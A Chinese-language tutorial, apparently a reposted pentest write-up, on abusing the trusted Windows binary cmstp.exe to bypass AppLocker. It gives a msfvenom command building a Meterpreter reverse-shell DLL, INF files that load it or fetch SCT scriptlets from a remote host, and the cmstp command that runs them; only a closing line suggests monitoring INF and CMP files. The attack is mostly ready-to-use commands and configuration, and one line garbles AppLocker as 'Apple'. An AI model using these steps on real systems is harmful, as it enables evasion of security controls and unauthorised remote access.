CMSTP中怎么繞過AppLocker

這期內(nèi)容當(dāng)中小編將會(huì)給大家?guī)碛嘘P(guān)CMSTP中怎么繞過AppLocker，文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

CMSTP是一個(gè)與Microsoft連接管理器配置文件安裝程序關(guān)聯(lián)的二進(jìn)制文件。它接受INF文件，這些文件可以通過惡意命令武器化，以腳本（SCT）和DLL的形式執(zhí)行任意代碼。它是一個(gè)受信任的Microsoft二進(jìn)制文件，位于以下兩個(gè)Windows目錄中。

C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe

AppLocker默認(rèn)規(guī)則允許在這些文件夾中執(zhí)行二進(jìn)制文件，因此我們可以用它來作為bypass的一種方法。該方法最初是由Oddvar Moe發(fā)現(xiàn)的，使用這個(gè)二進(jìn)制文件可以繞過AppLocker和UAC，具體可以參閱他的博文。

DLL

通過Metasploit Framework的msfvenom生成惡意DLL文件。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll &ampamp;gt; /root/Desktop/pentestlab.dll

INF文件的RegisterOCXSection需要包含惡意DLL文件的本地路徑或遠(yuǎn)程執(zhí)行的WebDAV位置。

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

Metasploit multi/handler模塊需要配置為接收連接。

當(dāng)惡意INF文件與cmstp一起提供時(shí)，代碼將會(huì)在后臺(tái)執(zhí)行。

cmstp.exe /s cmstp.inf

Meterpreter會(huì)話將從DLL執(zhí)行中打開。

SCT

除了DLL文件外，cmstp還能夠運(yùn)行SCT文件，這在紅隊(duì)操作中擴(kuò)展了二進(jìn)制的可用性。 Nick Tyrer最初通過Twitter展示了這種能力。

Nick Tyrer還編寫了一個(gè)名為powersct.sct的scriptlet，可以將其用作執(zhí)行PowerShell命令的備選解決方案，以應(yīng)對(duì)本機(jī)PowerShell被阻止的情況。UnRegisterOCXSection需要包含scriptlet的URL。最終的INF文件需要包含以下內(nèi)容：

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

當(dāng)INF文件被執(zhí)行一個(gè)新的窗口將打開，這將允許用戶執(zhí)行PowerShell命令。

cmstp.exe /s cmstp.inf

代碼執(zhí)行也可以通過使用scriptlet來調(diào)用惡意可執(zhí)行文件。INF文件需要包含scriptlet的遠(yuǎn)程位置。

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/pentestlab.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

在執(zhí)行INF文件時(shí)，將會(huì)打開一個(gè)新的命令提示符窗口，這表示代碼已被成功執(zhí)行。

成功獲取到一個(gè)Meterpreter會(huì)話。

總結(jié)

使用CMSTP二進(jìn)制來繞過Apple限制和代碼執(zhí)行。CMSTP需要INF文件并在執(zhí)行時(shí)生成一個(gè)CMP文件，它是連接管理器設(shè)置文件。因此，如果惡意攻擊者已經(jīng)開始使用此技術(shù)，且CMSTP.EXE二進(jìn)制無法被AppLocker規(guī)則阻止的情況下，則需要將這兩個(gè)文件作為IoC進(jìn)行監(jiān)視。

上述就是小編為大家分享的CMSTP中怎么繞過AppLocker了，如果剛好有類似的疑惑，不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識(shí)，歡迎關(guān)注億速云行業(yè)資訊頻道。